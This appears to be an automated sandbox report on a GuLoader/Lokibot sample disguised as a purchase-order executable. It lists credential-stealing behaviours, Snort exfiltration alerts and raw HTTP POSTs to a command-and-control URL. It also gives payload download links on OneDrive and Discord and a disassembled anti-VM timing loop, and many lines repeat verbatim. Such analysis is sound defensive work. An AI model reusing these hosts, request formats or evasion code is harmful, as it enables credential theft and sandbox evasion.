Analysis Report PO-A2174679-06.exe

Overview

General Information

Sample Name: PO-A2174679-06.exe
Analysis ID: 356484
MD5: fdec289fb4626dd56bbb55770ae5f432
SHA1: 1a1f324185e6114fb1362b00f27fe8009a202361
SHA256: eb53256b217e27a7ab0f71be2181599a79dc0569dea7fdbc5b32cf96a6bc9109
Tags: exe

Detection

GuLoader Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Lokibot
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • PO-A2174679-06.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\PO-A2174679-06.exe' MD5: FDEC289FB4626DD56BBB55770AE5F432)
    • PO-A2174679-06.exe (PID: 5424 cmdline: 'C:\Users\user\Desktop\PO-A2174679-06.exe' MD5: FDEC289FB4626DD56BBB55770AE5F432)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
Process Memory Space: PO-A2174679-06.exe PID: 5424 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: PO-A2174679-06.exe PID: 5424 | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
Process Memory Space: PO-A2174679-06.exe PID: 5424 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: PO-A2174679-06.exe | Virustotal: Detection: 16%

Compliance:

Uses 32bit PE files
Source: PO-A2174679-06.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49732 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49732 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49733 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49733 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 192.185.78.145:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 192.185.78.145:80
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: global traffic | HTTP traffic detected:
  POST /ovation/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: accessasia.com.hk
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 5EB0DDEC
  Content-Length: 192
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /ovation/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: accessasia.com.hk
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 5EB0DDEC
  Content-Length: 165
  Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
               Source: unknown | DNS traffic detected: queries for: onedrive.live.com
               Source: unknown | HTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: accessasia.com.hk | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 5EB0DDEC | Content-Length: 192 | Connection: close
               Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 23 Feb 2021 07:49:25 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade, close | Content-Length: 15 | Content-Type: text/html | Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
               Source: PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmp | String found in binary or memory: http://accessasia.com.hk/ovation/five/fre.php
               Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
               Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
               Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
               Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | String found in binary or memory: http://sinatrasmob.com/pro/ovation_byHOXsph232.bin
               Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/813514912135380996/813514973141532722/ovation_byHOXsph232.bin
               Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | String found in binary or memory: https://hrf0ga.bn.files.1drv.com/
               Source: PO-A2174679-06.exe, 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmp | String found in binary or memory: https://hrf0ga.bn.files.1drv.com/y4m5zM3NcSoKRZxp1cr4njUjeP9hX2vmu4HSL4nnw0taslILmJBULwQ1DfMXTHzg-Rs
               Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
               Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=B1076D30E2A6430F&resid=B1076D30E2A6430F%21110&authkey=AO3GCQa
               Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/n
               Source: PO-A2174679-06.exe, 00000000.00000002.346109535.000000000073A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process Stats: CPU usage > 98%
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0699 EnumWindows,NtSetInformationThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC4291 NtSetInformationThread,LdrInitializeThunk,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC81F3 NtResumeThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC7B36 NtProtectVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC570F NtSetInformationThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0977 NtWriteVirtualMemory,TerminateProcess,LdrInitializeThunk,LoadLibraryA,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6F5E NtWriteVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC1AB6 NtSetInformationThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC829E NtResumeThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC72EF NtWriteVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC84C5 NtResumeThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC083A NtSetInformationThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC1A7F NtSetInformationThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC446A NtSetInformationThread,NtWriteVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC8664 NtWriteVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC2DFD NtWriteVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6D2D NtSetInformationThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3105 NtWriteVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6F06 NtWriteVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC4307 NtSetInformationThread,NtWriteVirtualMemory,LdrInitializeThunk,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC077C NtSetInformationThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC2F6F NtWriteVirtualMemory,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC8554 NtResumeThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC8150 NtResumeThread,
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0977
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 11_3_00AB2165
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 11_3_00AB084D
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 11_3_00AB794D
               Source: PO-A2174679-06.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
               Source: PO-A2174679-06.exe, 00000000.00000002.346228693.00000000021F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs PO-A2174679-06.exe
               Source: PO-A2174679-06.exe, 00000000.00000000.231740123.0000000000414000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
               Source: PO-A2174679-06.exe, 0000000B.00000002.502209088.0000000002440000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs PO-A2174679-06.exe
               Source: PO-A2174679-06.exe, 0000000B.00000000.344741544.0000000000414000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
               Source: PO-A2174679-06.exe, 0000000B.00000002.502225382.0000000002490000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs PO-A2174679-06.exe
               Source: PO-A2174679-06.exe | Binary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
               Source: PO-A2174679-06.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
               Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@43/1
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File created: C:\Users\user\AppData\Local\Temp\~DF584B63FBA4AD36AE.TMP
               Source: PO-A2174679-06.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File read: C:\Windows\System32\drivers\etc\hosts
               Source: PO-A2174679-06.exe | Virustotal: Detection: 16%
               Source: unknown | Process created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

              Data Obfuscation:

               Yara detected GuLoader
               Source: Yara match | File source: 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp, type: MEMORY
               Source: Yara match | File source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
               Source: Yara match | File source: Process Memory Space: PO-A2174679-06.exe PID: 6600, type: MEMORY
               Yara detected VB6 Downloader Generic
               Source: Yara match | File source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
               Source: Yara match | File source: Process Memory Space: PO-A2174679-06.exe PID: 6600, type: MEMORY
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_0040DAC0 push dword ptr [ebp-14h]; ret
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_00404856 push edi; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_00406411 push edx; ret
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_004030D6 pushfd ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_00403096 pushfd ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3C9F pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3AE6 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3AC2 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3C38 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3C14 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC5015 pushfd ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3A02 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3C7B pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3A76 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3A52 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3B9F pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC39DE pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3BC3 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3B2B pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC3B50 pushad ; retf
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 11_3_00AB818D push ss; ret
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6F5E NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6F06 NtWriteVirtualMemory,
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC70A5 second address: 0000000002BC70A5 instructions:
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC7263 second address: 0000000002BC7263 instructions:
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC6D02 second address: 0000000002BC6D02 instructions:
    0x00000000 rdtsc
    0x00000002 xor eax, eax
    0x00000004 inc eax
    0x00000005 cpuid
    0x00000007 popad
    0x00000008 call 00007F0FBC787E78h
    0x0000000d lfence
    0x00000010 mov edx, dword ptr [7FFE0014h]
    0x00000016 lfence
    0x00000019 ret
    0x0000001a sub edx, esi
    0x0000001c ret
    0x0000001d cmp dx, bx
    0x00000020 add edi, edx
    0x00000022 cmp ax, cx
    0x00000025 dec dword ptr [ebp+000000F8h]
    0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h
    0x00000032 jne 00007F0FBC787E55h
    0x00000034 nop
    0x00000035 call 00007F0FBC787EAAh
    0x0000003a call 00007F0FBC787E88h
    0x0000003f lfence
    0x00000042 mov edx, dword ptr [7FFE0014h]
    0x00000048 lfence
    0x0000004b ret
    0x0000004c mov esi, edx
    0x0000004e pushad
    0x0000004f rdtsc
Tries to detect Any.run
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PO-A2174679-06.exe, PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC70A5 second address: 0000000002BC70A5 instructions:
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC7263 second address: 0000000002BC7263 instructions:
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC6D02 second address: 0000000002BC6D02 instructions:
    0x00000000 rdtsc
    0x00000002 xor eax, eax
    0x00000004 inc eax
    0x00000005 cpuid
    0x00000007 popad
    0x00000008 call 00007F0FBC787E78h
    0x0000000d lfence
    0x00000010 mov edx, dword ptr [7FFE0014h]
    0x00000016 lfence
    0x00000019 ret
    0x0000001a sub edx, esi
    0x0000001c ret
    0x0000001d cmp dx, bx
    0x00000020 add edi, edx
    0x00000022 cmp ax, cx
    0x00000025 dec dword ptr [ebp+000000F8h]
    0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h
    0x00000032 jne 00007F0FBC787E55h
    0x00000034 nop
    0x00000035 call 00007F0FBC787EAAh
    0x0000003a call 00007F0FBC787E88h
    0x0000003f lfence
    0x00000042 mov edx, dword ptr [7FFE0014h]
    0x00000048 lfence
    0x0000004b ret
    0x0000004c mov esi, edx
    0x0000004e pushad
    0x0000004f rdtsc
